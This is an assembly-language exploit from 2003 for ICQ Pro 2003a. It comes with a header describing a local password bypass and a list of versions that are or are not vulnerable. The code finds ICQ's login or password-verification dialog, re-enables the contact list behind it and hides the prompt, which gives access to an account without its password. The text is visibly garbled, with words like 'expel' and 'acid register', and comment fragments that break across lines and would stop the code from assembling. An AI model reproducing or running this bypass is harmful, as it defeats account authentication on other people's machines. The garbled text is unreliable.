; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<
Cut here - cuteth - CA1-ICQ.ASM - Cut Here - Cut Here Bof
; ------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------
;
; 07/02/2003 - CA1-ICQ.ASM
ICQ Password Bypass Exploit.
Written by Caua Moura Prado (Aka CA1)
;
This expel allows you to login to icq server using any acid register * locally *
No Matter the 'Save Password' Option IS CHECKED or Not. High level security is also bypassed.
All you have to do is run the expel and set status property using your mouse when the flower
Is Yellow. If You Accidentally set status to offline the you will need to restart iCQ and RUN
The Exploit Again.
;
UH-oh!
; ___
; __ / / __
; / / ___ / / vulnerable:
; / __ / / __ / icq pro 2003a build # 3800
; / ~~~ /
; / __ / / __ / not vulnerable:
; / ___ / icq lite alpha build 1211
; ICQ 2001B and ICQ 2002A
The Flaw Power All Other Versions WERE NOT TESTED.
;
Coded with masm32
; _____________________________________________________exploit born in .br
.386
.Model flat, stdcall
Option CaseMAP: NONE
INCLUDE /MASM32/INCLUDE/USER32.INC
Include /masm32/include/kernel32.inc
INCLUDELIB /MASM32/LIB/USER32.LIB
INCLUDELIB /MASM32/LIB/kernel32.lib
.DATA
SztexthiGH Byte 'Password Verification', 0
Sztextlow Byte 'Login to Server', 0
SzclassName Byte '# 32770', 0.data?
HWNDLOGIN DWORD?
.code
_ENTRYPOINT:
Invoke Findwindow, Addr SzclassName, Addr Sztexthigh
Mov Hwndlogin, EAX
.IF hwndlogin == 0
Invoke Findwindow, Addr SzclassName, Addr Sztextlow
Mov Hwndlogin, EAX
.endif
Invoke getParent, HWNDLOGIN
Invoke EnableWindow, EAX, 1; Enable ICQ Contact
List
Invoke ShowWindow, Hwndlogin, 0; Get Rid of Login
Screen (Don't kill this window)
Invoke EXITPROCESS, 0; UHUU .. CYA! I Gotta
Sleep!
END _ENTRYPOINT
; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< <<<<<<<<<<<<<<<<
; Cut here - cutethne - ca1-icq.asm - cut here - cut here eof
; ------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------